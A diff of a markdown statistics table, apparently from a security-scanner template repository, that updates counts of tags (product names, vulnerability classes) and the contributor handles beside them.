| | | | | -| joomlamo | 4 | apple | 1 | | | | | | | -| zend | 4 | momen eldawakhly | 1 | | | | | | | -| articatech | 4 | xstp | 1 | | | | | | | -| httpserver | 4 | themiddle | 1 | | | | | | | -| owncloud | 4 | shifacyclewla | 1 | | | | | | | -| ampache | 4 | compr00t | 1 | | | | | | | -| dragonfly | 4 | spac3wh1te | 1 | | | | | | | -| rabbitmq | 4 | unkl4b | 1 | | | | | | | -| prtg | 4 | millermedia | 1 | | | | | | | -| harbor | 4 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| centos | 4 | rojanrijal | 1 | | | | | | | -| creativeitem | 4 | vinit989 | 1 | | | | | | | -| pip | 4 | xcapri | 1 | | | | | | | -| subrion | 4 | 0xcharan | 1 | | | | | | | -| ray | 4 | bartu utku sarp | 1 | | | | | | | -| changedetection | 4 | h4sh5 | 1 | | | | | | | -| os4ed | 4 | palanichamy_perumal | 1 | | | | | | | -| telegram | 4 | bjhulst | 1 | | | | | | | -| phpjabber | 4 | invisiblethreat | 1 | | | | | | | -| candidats | 4 | stuxctf | 1 | | | | | | | -| moveit | 4 | lambdasawa | 1 | | | | | | | -| gnuboard | 4 | rumble773 | 1 | | | | | | | -| phppgadmin | 4 | aaban solutions | 1 | | | | | | | -| kyocera | 4 | fopina | 1 | | | | | | | -| mitel | 4 | screamy | 1 | | | | | | | -| panos | 4 | shivanshkhari | 1 | | | | | | | -| flickr | 4 | kresec | 1 | | | | | | | -| intelbras | 4 | failopen | 1 | | | | | | | -| mautic | 4 | lixts | 1 | | | | | | | -| opencms | 4 | 8authur | 1 | | | | | | | -| angular | 4 | mbmy | 1 | | | | | | | -| juniper | 4 | 5up3r541y4n | 1 | | | | | | | -| jfrog | 4 | patralos | 1 | | | | | | | -| postmessage | 4 | bugvsme | 1 | | | | | | | -| kentico | 4 | yuansec | 1 | | | | | | | -| igniterealtime | 4 | retr0 | 1 | | | | | | | -| pie-register | 4 | pussycat0 | 1 | | | | | | | -| pcoweb | 4 | miguelsegoviagil | 1 | | | | | | | -| osgeo | 4 | matthew nickerson (b0than) @ | 1 | | | | | | | -| | | layer 8 security | | | | | | | | -| kingsoft | 4 | mordavid | 1 | | | | | | | -| osint-archived | 4 | lark lab | 1 | | | | | | | -| globalprotect | 4 | freakyclown | 1 | | | | | | | -| codoso | 4 | jbertman | 1 | | | | | | | -| figma | 4 | luskabol | 1 | | | | | | | -| cve2005 | 4 | byobin | 1 | | | | | | | -| mostracms | 4 | manuelbua | 1 | | | | | | | -| mcafee | 4 | mah3sec_ | 1 | | | | | | | -| gradle | 4 | zhenwarx | 1 | | | | | | | -| grav | 4 | aceseven (digisec360) | 1 | | | | | | | -| sugarcrm | 4 | denandz | 1 | | | | | | | -| tplink | 4 | rotemreiss | 1 | | | | | | | -| metabase | 4 | fazle arefin | 1 | | | | | | | -| consul | 4 | akokonunes | 1 | | | | | | | -| mostra | 4 | bad5ect0r | 1 | | | | | | | -| horde | 4 | open-sec | 1 | | | | | | | -| concrete | 4 | liquidsec | 1 | | | | | | | -| linksys | 4 | whotwagner | 1 | | | | | | | -| dahuasecurity | 4 | yaser_s | 1 | | | | | | | -| e-mobile | 4 | s1r1us | 1 | | | | | | | -| ghost | 4 | marcos_iaf | 1 | | | | | | | -| nosqli | 4 | davidfegyver | 1 | | | | | | | -| springcloud | 4 | shreyapohekar | 1 | | | | | | | -| wp-statistics | 4 | jas37 | 1 | | | | | | | -| dvr | 4 | hotpot | 1 | | | | | | | -| hospital_management_system_project | 4 | viniciuspereiras | 1 | | | | | | | -| sudo | 3 | allenwest24 | 1 | | | | | | | -| yii | 3 | arall | 1 | | | | | | | -| waf | 3 | asteria121 | 1 | | | | | | | -| ixcache | 3 | mohammad reza omrani | | 1 | | | | | | | +| bigip | 8 | couskito | 1 | | | | | | | +| leak | 7 | sorrowx3 | 1 | | | | | | | +| activemq | 7 | aron molnar | 1 | | | | | | | +| shopify | 7 | koratsec | 1 | | | | | | | +| keking | 7 | millermedia | 1 | | | | | | | +| vpc | 7 | sumanth vankineni | 1 | | | | | | | +| nortekcontrol | 7 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| opensis | 7 | alevsk | 1 | | | | | | | +| maps | 7 | chesterblue | 1 | | | | | | | +| oos | 7 | ahmed sherif | 1 | | | | | | | +| moodating | 7 | jfbes | 1 | | | | | | | +| pmb | 7 | hotpot | 1 | | | | | | | +| splunk | 7 | carson chan | 1 | | | | | | | +| monstra | 7 | gonski | 1 | | | | | | | +| cnvd2023 | 7 | kiransau | 1 | | | | | | | +| vrealize | 7 | shivanshkhari | 1 | | | | | | | +| fpd | 7 | ahmed abou-ela | 1 | | | | | | | +| rat | 7 | xc1ym | 1 | | | | | | | +| squirrelmail | 7 | 0xprial | 1 | | | | | | | +| twitter | 7 | dale clarke | 1 | | | | | | | +| gogs | 7 | realexp3rt | 1 | | | | | | | +| vms | 7 | youngpope | 1 | | | | | | | +| contec | 7 | queencitycyber | 1 | | | | | | | +| keycloak | 7 | kurohost | 1 | | | | | | | +| virtual-machines | 7 | un-fmunozs | 1 | | | | | | | +| couchdb | 7 | duty_1g | 1 | | | | | | | +| rfi | 7 | s1r1u5_ | 1 | | | | | | | +| exploitdb | 7 | yashanand155 | 1 | | | | | | | +| jeecg | 7 | dabla | 1 | | | | | | | +| geoserver | 7 | yhy0 | 1 | | | | | | | +| websphere | 7 | noamrathaus | 1 | | | | | | | +| nextjs | 7 | allenwest24 | 1 | | | | | | | +| linkedin | 7 | act1on3 | 1 | | | | | | | +| slack | 7 | amir-h-fallahi | 1 | | | | | | | +| pods | 7 | diablo | 1 | | | | | | | +| filemanager | 7 | affix | 1 | | | | | | | +| telesquare | 7 | undefl0w | 1 | | | | | | | +| car_rental_management_system_project | 7 | unblvr1 | 1 | | | | | | | +| blockchain | 7 | dawid-czarnecki | 1 | | | | | | | +| teamcity | 7 | mayankpandey01 | 1 | | | | | | | +| ruckus | 7 | rotembar | 1 | | | | | | | +| database | 7 | mukundbhuva | 1 | | | | | | | +| spip | 6 | narluin | 1 | | | | | | | +| paloaltonetworks | 6 | encodedguy | 1 | | | | | | | +| jwt | 6 | pphuahua | 1 | | | | | | | +| express | 6 | michael wedl | 1 | | | | | | | +| asus | 6 | thelicato | 1 | | | | | | | +| avideo | 6 | ptonewreckin | 1 | | | | | | | +| zhiyuan | 6 | am0nt31r0 | 1 | | | | | | | +| mikrotik | 6 | tehtbl | 1 | | | | | | | +| advantech | 6 | palanichamy_perumal | 1 | | | | | | | +| 74cms | 6 | schniggie | 1 | | | | | | | +| doctor_appointment_system_project | 6 | infosecsanyam | 1 | | | | | | | +| asp | 6 | mubassirpatel | 1 | | | | | | | +| totolink | 6 | kiks7 | 1 | | | | | | | +| virtual-machine | 6 | eremit4 | 1 | | | | | | | +| craftcms | 6 | kishore krishna (sillydaddy) | 1 | | | | | | | +| jetty | 6 | f1she3 | 1 | | | | | | | +| kubelet | 6 | ok_bye_now | 1 | | | | | | | +| flutterwave | 6 | 0xh7ml | 1 | | | | | | | +| bmc | 6 | retr0 | 1 | | | | | | | +| chanjet | 6 | 1nf1n7y | 1 | | | | | | | +| elfinder | 6 | push4d | 1 | | | | | | | +| webmin | 6 | nechyo | 1 | | | | | | | +| dom | 6 | arr0way | 1 | | | | | | | +| jamf | 6 | arjunchandarana | 1 | | | | | | | +| cve2007 | 6 | exceed | 1 | | | | | | | +| online_fire_reporting_system_project | 6 | jbertman | 1 | | | | | | | +| api-management | 6 | jas37 | 1 | | | | | | | +| gcp | 6 | ndmalc | 1 | | | | | | | +| typo3 | 6 | marcio mendes | 1 | | | | | | | +| h3c | 6 | regala_ | 1 | | | | | | | +| magmi | 6 | piyushchhiroliya | 1 | | | | | | | +| akamai | 6 | kresec | 1 | | | | | | | +| plesk | 6 | tangxiaofeng7 | 1 | | | | | | | +| doctor-appointment-system | 6 | omarjezi | 1 | | | | | | | +| pyload | 6 | will mccardell | 1 | | | | | | | +| froxlor | 6 | mabdullah22 | 1 | | | | | | | +| openvpn | 6 | mariam tariq | 1 | | | | | | | +| sonarqube | 6 | staticnoise | 1 | | | | | | | +| synacor | 6 | knassar702 | 1 | | | | | | | +| beyondtrust | 6 | bjhulst | 1 | | | | | | | +| server | 6 | s1r1us | 1 | | | | | | | +| online-fire-reporting | 6 | bad5ect0r | 1 | | | | | | | +| learnpress | 6 | deena | 1 | | | | | | | +| chamilo | 6 | qlkwej | 1 | | | | | | | +| paypal | 6 | breno_css | 1 | | | | | | | +| cockpit | 6 | ringo | 1 | | | | | | | +| tikiwiki | 6 | themiddle | 1 | | | | | | | +| microstrategy | 6 | allendemoura | 1 | | | | | | | +| liferay | 6 | lbb | 1 | | | | | | | +| functionapp | 6 | k3rwin | 1 | | | | | | | +| minio | 6 | _c0wb0y_ | 1 | | | | | | | +| cobbler | 6 | w0tx | 1 | | | | | | | +| http | 5 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| 10web | 5 | watchtowr | 1 | | | | | | | +| vehicle_service_management_system_project | 5 | stupidfish | 1 | | | | | | | +| adminer | 5 | luciannitescu | 1 | | | | | | | +| caucho | 5 | xiaowangsec | 1 | | | | | | | +| mantisbt | 5 | david botelho mariano | 1 | | | | | | | +| swagger | 5 | colbyjack1134 | 1 | | | | | | | +| redmine | 5 | hlop | 1 | | | | | | | +| connectwise | 5 | h4sh5 | 1 | | | | | | | +| zzzcms | 5 | unp4ck | 1 | | | | | | | +| api-server | 5 | technicaljunkie | 1 | | | | | | | +| avaya | 5 | jna1 | 1 | | | | | | | +| react | 5 | af001 | 1 | | | | | | | +| percha | 5 | fpatrik | 1 | | | | | | | +| sftp | 5 | rinolock | 1 | | | | | | | +| ethereum | 5 | djoevanka | 1 | | | | | | | +| qdpm | 5 | ruppde | 1 | | | | | | | +| adb | 5 | exploitation | 1 | | | | | | | +| rseenet | 5 | 0xd0ff9 | 1 | | | | | | | +| dionaea | 5 | miguelsegoviagil | 1 | | | | | | | +| checkpoint | 5 | wabafet | 1 | | | | | | | +| axigen | 5 | alpernae | 1 | | | | | | | +| jellyfin | 5 | bugvsme | 1 | | | | | | | +| schneider-electric | 5 | caon | 1 | | | | | | | +| decision-center | 5 | d4ly | 1 | | | | | | | +| blackenergy | 5 | jaimin gondaliya | 1 | | | | | | | +| glpi-project | 5 | sujal tuladhar | 1 | | | | | | | +| webview | 5 | sherlocksecurity | 1 | | | | | | | +| carrental | 5 | chybeta | 1 | | | | | | | +| jupyter | 5 | jonathanwalker | 1 | | | | | | | +| agentejo | 5 | petruknisme | 1 | | | | | | | +| thedigitalcraft | 5 | cbadke | 1 | | | | | | | +| elementor | 5 | marcos_iaf | 1 | | | | | | | +| chatgpt | 5 | udyz | 1 | | | | | | | +| wpdevart | 5 | defte | 1 | | | | | | | +| ems | 5 | hexcat | 1 | | | | | | | +| esafenet | 5 | ramkrishna sawant | 1 | | | | | | | +| fit2cloud | 5 | open-sec | 1 | | | | | | | +| qnap | 5 | ky9oss | 1 | | | | | | | +| web3 | 5 | r3s ost | 1 | | | | | | | +| cdata | 5 | j33n1k4 | 1 | | | | | | | +| metinfo | 5 | ooooooo_q | 1 | | | | | | | +| etcd | 5 | manuelbua | 1 | | | | | | | +| tenda | 5 | 0xcharan | 1 | | | | | | | +| awstats | 5 | mhdsamx | 1 | | | | | | | +| openfire | 5 | lrtk-coder | 1 | | | | | | | +| telerik | 5 | pussycat0 | 1 | | | | | | | +| hpe | 5 | sicksec | 1 | | | | | | | +| terramaster | 5 | anon-artist | 1 | | | | | | | +| arcgis | 5 | jaskaran | 1 | | | | | | | +| httpd | 5 | ohlinge | 1 | | | | | | | +| circontrol | 5 | yusakie | 1 | | | | | | | +| apisix | 5 | ofjaaah | 1 | | | | | | | +| hoteldruid | 5 | efran | 1 | | | | | | | +| piwigo | 5 | axrk | 1 | | | | | | | +| xmlrpc | 5 | retr02332 | 1 | | | | | | | +| sentry | 5 | olewagner | 1 | | | | | | | +| wbce | 5 | defektive | 1 | | | | | | | +| mssql | 5 | _harleo | 1 | | | | | | | +| dolibarr | 5 | bjxsec | 1 | | | | | | | +| hybris | 5 | igibanez | 1 | | | | | | | +| tibco | 5 | rivalsec | 1 | | | | | | | +| acm | 5 | zandros0 | 1 | | | | | | | +| kkfileview | 5 | clment cruchet | 1 | | | | | | | +| voip | 5 | ryanborum | 1 | | | | | | | +| resin | 5 | 2rs3c | 1 | | | | | | | +| gnu | 5 | andysvints | 1 | | | | | | | +| genetechsolutions | 5 | xstp | 1 | | | | | | | +| magmi_project | 5 | fq_hsu | 1 | | | | | | | +| papercut | 5 | christbowel | 1 | | | | | | | +| crushftp | 5 | brabbit10 | 1 | | | | | | | +| circarlife | 5 | iampritam | 1 | | | | | | | +| fatpipe | 5 | rotemreiss | 1 | | | | | | | +| nuuo | 5 | irshadahamed | 1 | | | | | | | +| openstack | 5 | makyotox | 1 | | | | | | | +| digitaldruid | 5 | xeldax | 1 | | | | | | | +| parallels | 5 | remi gascou (podalirius) | 1 | | | | | | | +| gocd | 5 | amanrawat | 1 | | | | | | | +| sysaid | 5 | 0ut0fb4nd | 1 | | | | | | | +| webkul | 5 | paper-pen | 1 | | | | | | | +| eyoucms | 5 | luqman | 1 | | | | | | | +| open-emr | 5 | wlayzz | 1 | | | | | | | +| goanywhere | 5 | manasmbellani | 1 | | | | | | | +| password | 5 | aravind | 1 | | | | | | | +| graylog | 5 | ling | 1 | | | | | | | +| matrix | 5 | west-wise | 1 | | | | | | | +| cloudflare | 5 | shelld3v | 1 | | | | | | | +| firmware | 5 | morgan robertson | 1 | | | | | | | +| asana | 5 | liquidsec | 1 | | | | | | | +| apollo | 5 | remonsec | 1 | | | | | | | +| square | 5 | anonymous | 1 | | | | | | | +| jabber | 5 | aresx | 1 | | | | | | | +| telegram | 5 | sickwell | 1 | | | | | | | +| spark | 5 | gboddin | 1 | | | | | | | +| hongdian | 4 | 0xtavian | 1 | | | | | | | +| harmistechnology | 4 | ap3r | 1 | | | | | | | +| ampache | 4 | screamy | 1 | | | | | | | +| tplink | 4 | carlosvieira | 1 | | | | | | | +| auieo | 4 | hardik-rathod | 1 | | | | | | | +| sigb | 4 | yashvardhantripathi | 1 | | | | | | | +| intelbras | 4 | sshell | 1 | | | | | | | +| rubyonrails | 4 | chetgan | 1 | | | | | | | +| grav | 4 | mchklt | 1 | | | | | | | +| newstatpress | 4 | 0xparth | 1 | | | | | | | +| metasploit | 4 | kaizensecurity | 1 | | | | | | | +| hospital_management_system_project | 4 | unkl4b | 1 | | | | | | | +| linksys | 4 | booboohq | 1 | | | | | | | +| mostra | 4 | 0xteles | 1 | | | | | | | +| candidats | 4 | aaban solutions | 1 | | | | | | | +| imgproxy | 4 | bartu utku sarp | 1 | | | | | | | +| gradle | 4 | 0h1in9e | 1 | | | | | | | +| heroku | 4 | m0ck3d | 1 | | | | | | | +| ghost | 4 | dorkerdevil | 1 | | | | | | | +| pluginus | 4 | sec_hawk | 1 | | | | | | | +| dahuasecurity | 4 | calumjelrick | 1 | | | | | | | +| sugarcrm | 4 | tirtha_mandal | 1 | | | | | | | +| osgeo | 4 | kailashbohara | 1 | | | | | | | +| mailchimp | 4 | 0xrod | 1 | | | | | | | +| kevinlab | 4 | j3ssie/geraldino2 | 1 | | | | | | | +| phpipam | 4 | rojanrijal | 1 | | | | | | | +| concrete | 4 | alex | 1 | | | | | | | +| globalprotect | 4 | joaonevess | 1 | | | | | | | +| mitel | 4 | miryangjung | 1 | | | | | | | +| monitor | 4 | hczdmr | 1 | | | | | | | +| tiki | 4 | noel | 1 | | | | | | | +| creativeitem | 4 | worldwidefuckfest | 1 | | | | | | | +| ray | 4 | juliosmelo | 1 | | | | | | | +| seagate | 4 | n0el4kls | 1 | | | | | | | +| wireguard | 4 | jub0bs | 1 | | | | | | | +| linuxfoundation | 4 | akash.c | 1 | | | | | | | +| supsystic | 4 | shivampand3y | 1 | | | | | | | +| puppet | 4 | pastaga | 1 | | | | | | | +| yeswiki | 4 | izn0u | 1 | | | | | | | +| finicity | 4 | lady_bug | 1 | | | | | | | +| aura | 4 | lingtren | 1 | | | | | | | +| dos | 4 | smaranchand | 1 | | | | | | | +| dragonfly | 4 | tim_koopmans | 1 | | | | | | | +| springcloud | 4 | null_hypothesis | 1 | | | | | | | +| sendgrid | 4 | dk999 | 1 | | | | | | | +| zte | 4 | sw0rk17 | 1 | | | | | | | +| ransomware | 4 | jeya.seelan | 1 | | | | | | | +| rocketchat | 4 | omarkurt | 1 | | | | | | | +| cnvd2022 | 4 | 8authur | 1 | | | | | | | +| harbor | 4 | thirukrishnan | 1 | | | | | | | +| mautic | 4 | dmartyn | 1 | | | | | | | +| dvr | 4 | guax1 | 1 | | | | | | | +| flickr | 4 | qotoz | 1 | | | | | | | +| owncloud | 4 | tirtha | 1 | | | | | | | +| os4ed | 4 | rumble773 | 1 | | | | | | | +| sql-database | 4 | _darrenmartyn | 1 | | | | | | | +| salesforce | 4 | higor melgaço | 1 | | | | | | | +| rabbitmq | 4 | jcockhren | 1 | | | | | | | +| panabit | 4 | noobexploiter | 1 | | | | | | | +| prtg | 4 | httpvoid | 1 | | | | | | | +| bamboo | 4 | hyunsoo-ds | 1 | | | | | | | +| umbraco | 4 | rahaaaiii | 1 | | | | | | | +| articatech | 4 | pdp | 1 | | | | | | | +| changedetection | 4 | pudsec | 1 | | | | | | | +| projectsend | 4 | mihail8531 | 1 | | | | | | | +| confluent | 4 | aceseven (digisec360) | 1 | | | | | | | +| gnuboard | 4 | alperenkesk | 1 | | | | | | | +| pixie | 4 | jadu101 | 1 | | | | | | | +| consul | 4 | evan rubinstien | 1 | | | | | | | +| djangoproject | 4 | pry0cc | 1 | | | | | | | +| mostracms | 4 | osamahamad | 1 | | | | | | | +| figma | 4 | luqmaan hadia | 1 | | | | | | | +| photo | 4 | pascalheidmann | 1 | | | | | | | +| temenos | 4 | rschio | 1 | | | | | | | +| cnvd2019 | 4 | zeyad azima | 1 | | | | | | | +| igniterealtime | 4 | erikowen | 1 | | | | | | | +| flink | 4 | codestuffbreakthings | 1 | | | | | | | +| ad | 4 | michal-mikolas | 1 | | | | | | | +| kingsoft | 4 | shiar | 1 | | | | | | | +| httpserver | 4 | w8ay | 1 | | | | | | | +| eclipse | 4 | mlec | 1 | | | | | | | +| linkerd | 4 | borna nematzadeh | 1 | | | | | | | +| listserv | 4 | ipanda | 1 | | | | | | | +| centos | 4 | x6263 | 1 | | | | | | | +| jfrog | 4 | mass0ma | 1 | | | | | | | +| kyocera | 4 | samuelsamuelsamuel | 1 | | | | | | | +| pentaho | 4 | revblock | 1 | | | | | | | +| kibana | 4 | houdinis | 1 | | | | | | | +| kentico | 4 | elmahdi | 1 | | | | | | | +| artifactory | 4 | jbaines-r7 | 1 | | | | | | | +| jsf | 4 | drfabiocastro | 1 | | | | | | | +| sound4 | 4 | mah3sec_ | 1 | | | | | | | +| hongfan | 4 | charanrayudu | 1 | | | | | | | +| okta | 4 | mr.bobo hp | 1 | | | | | | | +| env | 4 | notsoevilweasel | 1 | | | | | | | +| moveit | 4 | wpsec | 1 | | | | | | | +| cookie | 4 | yiran | 1 | | | | | | | +| shiro | 4 | alexrydzak | 1 | | | | | | | +| juniper | 4 | spac3wh1te | 1 | | | | | | | +| newstatpress_project | 4 | jc175 | 1 | | | | | | | +| mcafee | 4 | kba@sogeti_esec | 1 | | | | | | | +| esri | 4 | vinit989 | 1 | | | | | | | +| zend | 4 | hateshape | 1 | | | | | | | +| shell | 4 | phillipo | 1 | | | | | | | +| roxy | 4 | jrolf | 1 | | | | | | | +| easypost | 4 | naglis | 1 | | | | | | | +| opencms | 4 | metascan | 1 | | | | | | | +| metabase | 4 | mihhailsokolov | 1 | | | | | | | +| search | 4 | pjborah | 1 | | | | | | | +| pie-register | 4 | geraldino2 | 1 | | | | | | | +| webshell | 4 | willd96 | 1 | | | | | | | +| thinkcmf | 4 | shockwave | 1 | | | | | | | +| myeventon | 4 | aringo-bf | 1 | | | | | | | +| joomlamo | 4 | notwhy | 1 | | | | | | | +| codoso | 4 | gmeghab | 1 | | | | | | | +| d-link | 4 | y0no | 1 | | | | | | | +| datadog | 4 | aaronchen0 | 1 | | | | | | | +| thimpress | 4 | drewvravick | 1 | | | | | | | +| webmail | 4 | shiva (strobes security) | 1 | | | | | | | +| metersphere | 4 | intx0x80 | 1 | | | | | | | +| info | 4 | bleron rrustemi | 1 | | | | | | | +| postmessage | 4 | ahmetpergamum | 1 | | | | | | | +| churchcrm | 4 | vikas kundu | 1 | | | | | | | +| age-encryption | 4 | arqsz | 1 | | | | | | | +| wp-statistics | 4 | lamscun | 1 | | | | | | | +| bitrix | 4 | pwnwithlove | 1 | | | | | | | +| angular | 4 | husain | 1 | | | | | | | +| flatpress | 4 | opencirt | 1 | | | | | | | +| superwebmailer | 4 | matt miller | 1 | | | | | | | +| codeigniter | 4 | flag007 | 1 | | | | | | | +| ternaria | 4 | momen eldawakhly | 1 | | | | | | | +| panos | 4 | whynotke | 1 | | | | | | | +| mooveagency | 4 | william söderberg @ withsecure | 1 | | | | | | | +| aspose | 4 | amnotacat | 1 | | | | | | | +| account-takeover | 4 | f0xy | 1 | | | | | | | +| pip | 4 | mohammedsaneem | 1 | | | | | | | +| pcoweb | 4 | majidmc2 | 1 | | | | | | | +| pmb_project | 4 | d0rkerdevil | 1 | | | | | | | +| casaos | 4 | mammad_rahimzada | 1 | | | | | | | +| aria | 4 | abdullahisik | 1 | | | | | | | +| phpjabber | 4 | kareemse1im | 1 | | | | | | | +| bittrex | 4 | sanineng | 1 | | | | | | | +| dotnet | 4 | nerrorsec | 1 | | | | | | | +| veronalabs | 4 | kr1shna4garwal | 1 | | | | | | | +| containers | 4 | barttran2000 | 1 | | | | | | | +| reprisesoftware | 4 | orpheus | 1 | | | | | | | +| terra-master | 4 | lixts | 1 | | | | | | | +| phppgadmin | 4 | phyr3wall | 1 | | | | | | | +| nosqli | 4 | daviey | 1 | | | | | | | +| pega | 4 | micha3lb3n | 1 | | | | | | | +| proftpd | 4 | danfaizer | 1 | | | | | | | +| rstudio | 4 | nukunga | 1 | | | | | | | +| royalevent | 4 | pratik khalane | 1 | | | | | | | +| horde | 4 | higor melgaço (eremit4) | 1 | | | | | | | +| cve2005 | 4 | viondexd | 1 | | | | | | | +| ebs | 4 | co0nan | 1 | | | | | | | +| e-mobile | 4 | pepitoh | 1 | | | | | | | +| openam | 4 | hazana | 1 | | | | | | | +| audiocodes | 4 | kagamigawa | 1 | | | | | | | +| jorani | 4 | barthy.koeln | 1 | | | | | | | +| osint-archived | 4 | napgh0st | 1 | | | | | | | +| wcs | 4 | secthebit | 1 | | | | | | | +| stripe | 4 | godfatherorwa | 1 | | | | | | | +| powerjob | 4 | fur1na | 1 | | | | | | | +| subrion | 4 | kabirsuda | 1 | | | | | | | +| rundeck | 3 | 0xceba | 1 | | | | | | | +| openwrt | 3 | davidfegyver | 1 | | | | | | | +| yii | 3 | droberson | 1 | | | | | | | +| siemens | 3 | r3nz0 | 1 | | | | | | | +| dreambox | 3 | unknown | 1 | | | | | | | +| xxljob | 3 | nytr0gen | 1 | | | | | | | +| wpdeveloper | 3 | sospiro | 1 | | | | | | | +| fuelcms | 3 | asteria121 | 1 | | | | | | | +| ruckuswireless | 3 | mesaglio | 1 | | | | | | | +| rubygems | 3 | ldionmarcil | 1 | | | | | | | +| mailgun | 3 | noah @thesubtlety | 1 | | | | | | | +| learndash | 3 | furkansenan | 1 | | | | | | | +| bonita | 3 | petergrifin | 1 | | | | | | | +| octobercms | 3 | team syslifters / christoph | 1 | | | | | | | +| | | mahrl | | | | | | | | +| fileman | 3 | b4uh0lz | 1 | | | | | | | +| targa | 3 | rubina119 | 1 | | | | | | | +| hfs | 3 | freakyclown | 1 | | | | | | | +| lansweeper | 3 | domenicoveneziano | 1 | | | | | | | +| mythic | 3 | win3zz | 1 | | | | | | | +| idor | 3 | adilsoybali | 1 | | | | | | | +| udp | 3 | jiheon-dev | 1 | | | | | | | +| credential | 3 | harshinsecurity | 1 | | | | | | | +| revive-adserver | 3 | none | 1 | | | | | | | +| repetier | 3 | jteles | 1 | | | | | | | +| cluster | 3 | chron0x | 1 | | | | | | | +| sharefile | 3 | zsusac | 1 | | | | | | | +| adiscon | 3 | savik | 1 | | | | | | | +| csti | 3 | mbmy | 1 | | | | | | | +| freshrss | 3 | banana69 | 1 | | | | | | | +| buffalo | 3 | nobody | 1 | | | | | | | +| softwarepublico | 3 | oscarintherocks | 1 | | | | | | | +| dataease | 3 | apple | 1 | | | | | | | +| magnolia | 3 | hĂŒseyin tintaƟ | 1 | | | | | | | +| cas | 3 | high | 1 | | | | | | | +| idrac | 3 | iphantasmic | 1 | | | | | | | +| thinfinity | 3 | ynnirc | 1 | | | | | | | +| passcv | 3 | luqmaan hadia | 1 | | | | | | | +| | | [luqiih](https://github.com/luqiih) | | | | | | | | +| trendnet | 3 | lark lab | 1 | | | | | | | +| selenium | 3 | sdcampbell | 1 | | | | | | | +| particle | 3 | andirrahmani1 | 1 | | | | | | | +| securepoint | 3 | bughuntersurya | 1 | | | | | | | +| cybelesoft | 3 | official_blackhat13 | 1 | | | | | | | +| webkul-qloapps | 3 | thebinitghimire | 1 | | | | | | | +| zeroshell | 3 | 5up3r541y4n | 1 | | | | | | | +| clusterengine | 3 | juicypotato1 | 1 | | | | | | | +| boldgrid | 3 | mantissts | 1 | | | | | | | +| adafruit | 3 | stux | 1 | | | | | | | +| switch | 3 | adamparsons | 1 | | | | | | | +| finecms | 3 | fopina | 1 | | | | | | | +| superset | 3 | babybash | 1 | | | | | | | +| webnus | 3 | olfloralo | 1 | | | | | | | +| tplus | 3 | xshuden | 1 | | | | | | | +| fastly | 3 | cravaterouge | 1 | | | | | | | +| mongo | 3 | akshansh | 1 | | | | | | | +| sitemap | 3 | karkis3c | 1 | | | | | | | +| postgres | 3 | toufik-airane | 1 | | | | | | | +| saml | 3 | hanlaomo | 1 | | | | | | | +| jeesns | 3 | floriandewald | 1 | | | | | | | +| r-seenet | 3 | compr00t | 1 | | | | | | | +| droneci | 3 | byobin | 1 | | | | | | | +| network-security-group | 3 | furkansayim | 1 | | | | | | | +| camaleon | 3 | elder tao | 1 | | | | | | | +| tp-link | 3 | vince-isec | 1 | | | | | | | +| openbmcs | 3 | yaser_s | 1 | | | | | | | +| std42 | 3 | lambdasawa | 1 | | | | | | | +| posh | 3 | securitytaters | 1 | | | | | | | +| copyparty | 3 | ransomsec | 1 | | | | | | | +| opencart | 3 | jeya seelan | 1 | | | | | | | +| loytec | 3 | skylark-lab | 1 | | | | | | | +| self-hosted | 3 | b0rn2r00t | 1 | | | | | | | +| synapse | 3 | adrianmf | 1 | | | | | | | +| cpanel | 3 | vulnspace | 1 | | | | | | | +| western_digital | 3 | xcapri | 1 | | | | | | | +| watchguard | 3 | dwbzn | 1 | | | | | | | +| osticket | 3 | johndoeanonita | 1 | | | | | | | +| woodwing | 3 | harksu | 1 | | | | | | | +| cloudstack | 3 | yavolo | 1 | | | | | | | +| forgerock | 3 | imhunterand | 1 | | | | | | | +| newsletter | 3 | qianbenhyu | 1 | | | | | | | +| thefactory | 3 | arall | 1 | | | | | | | +| hjsoft | 3 | stuxctf | 1 | | | | | | | +| mobsf | 3 | berkdusunur | 1 | | | | | | | +| 3cx | 3 | mohammad reza omrani | | 1 | | | | | | | | | | @omranisecurity | | | | | | | | -| i3geo | 3 | qianbenhyu | 1 | | | | | | | -| webadmin | 3 | sak1 | 1 | | | | | | | -| dataease | 3 | unknown | 1 | | | | | | | -| samba | 3 | codestuffbreakthings | 1 | | | | | | | -| vercel | 3 | iphantasmic | 1 | | | | | | | -| mpsec | 3 | zsusac | 1 | | | | | | | -| grp | 3 | ruppde | 1 | | | | | | | -| label-studio | 3 | koyejune0302 | 1 | | | | | | | -| wwbn | 3 | efran | 1 | | | | | | | -| sql-server | 3 | danfaizer | 1 | | | | | | | -| apim | 3 | jbaines-r7 | 1 | | | | | | | -| zerof | 3 | hyunsoo-ds | 1 | | | | | | | -| openbmcs | 3 | dali | 1 | | | | | | | -| sony | 3 | miryangjung | 1 | | | | | | | -| itop | 3 | r3s ost | 1 | | | | | | | -| fanwei | 3 | joanbonon | 1 | | | | | | | -| c3325 | 3 | nerrorsec | 1 | | | | | | | -| magnolia | 3 | jaskaran | 1 | | | | | | | -| pandorafms | 3 | am0nt31r0 | 1 | | | | | | | -| sharp | 3 | breno_css | 1 | | | | | | | -| sharefile | 3 | justmumu | 1 | | | | | | | -| targa | 3 | omarkurt | 1 | | | | | | | -| javascript | 3 | remi gascou (podalirius) | 1 | | | | | | | -| rancher | 3 | whynotke | 1 | | | | | | | -| finereport | 3 | phillipo | 1 | | | | | | | -| clientid | 3 | sw0rk17 | 1 | | | | | | | -| complete_online_job_search_system_project | 3 | lamscun | 1 | | | | | | | -| calibre | 3 | w8ay | 1 | | | | | | | -| forum | 3 | kr1shna4garwal | 1 | | | | | | | -| imap | 3 | imhunterand | 1 | | | | | | | -| emlog | 3 | vthiery | 1 | | | | | | | -| unifi | 3 | eremit4 | 1 | | | | | | | -| selea | 3 | qlkwej | 1 | | | | | | | -| repetier | 3 | un-fmunozs | 1 | | | | | | | -| rlm | 3 | elouhi | 1 | | | | | | | -| dubbo | 3 | abbas.heybati | 1 | | | | | | | -| gitblit | 3 | sdcampbell | 1 | | | | | | | -| h2o | 3 | furkansenan | 1 | | | | | | | -| tableau | 3 | will mccardell | 1 | | | | | | | -| decision-server | 3 | naglis | 1 | | | | | | | -| key | 3 | calumjelrick | 1 | | | | | | | -| diagrams | 3 | osamahamad | 1 | | | | | | | -| thefactory | 3 | charanrayudu | 1 | | | | 